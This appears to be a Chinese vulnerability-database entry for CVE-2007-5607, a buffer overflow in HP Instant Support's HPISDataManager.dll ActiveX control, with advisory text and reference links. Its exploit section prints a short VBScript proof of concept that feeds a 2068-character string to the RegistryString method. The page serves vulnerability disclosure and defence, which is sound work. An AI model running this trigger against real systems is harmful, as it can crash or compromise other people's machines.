HP Instant Support HPISDataManager.dll ActiveX控件 RegistryString功能缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115348 漏洞类型 代码注入
发布时间 2008-06-04 更新时间 2008-08-13
CVE编号 CVE-2007-5607 CNNVD-ID CNNVD-200806-059
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/31877
https://www.securityfocus.com/bid/29534
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-059
|漏洞详情
HPInstantSupport是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。HPInstantSupport1.0.0.24之前的版本,所安装的HPISDataManager.dllActiveX控件RegistryString功能存在缓冲区溢出漏洞,远程攻击者可以利用一个长参数执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/29534/info

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String" memberName = "RegistryString" progid = "HPISDataManagerLib.Datamgr" argCount = 3 arg1=String(2068, "B") arg2=1 arg3="defaultV" target.RegistryString(arg1 ,arg2 ) = arg3 </script></job></package>
|受影响的产品
HP Instant Support 1.0 .22
|参考资料

来源:XF
名称:hp-instantsupport-registrystring-bo(42848)
链接:http://xforce.iss.net/xforce/xfdb/42848
来源:HP
名称:SSRT071490
链接:http://www12.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01422264
来源:SECTRACK
名称:1020165
链接:http://www.securitytracker.com/id?1020165
来源:BID
名称:29534
链接:http://www.securityfocus.com/bid/29534
来源:BID
名称:29526
链接:http://www.securityfocus.com/bid/29526
来源:VUPEN
名称:ADV-2008-1740
链接:http://www.frsirt.com/english/advisories/2008/1740/references
来源:MISC
链接:http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
来源:SECUNIA
名称:30516
链接:http://secunia.com/advisories/30516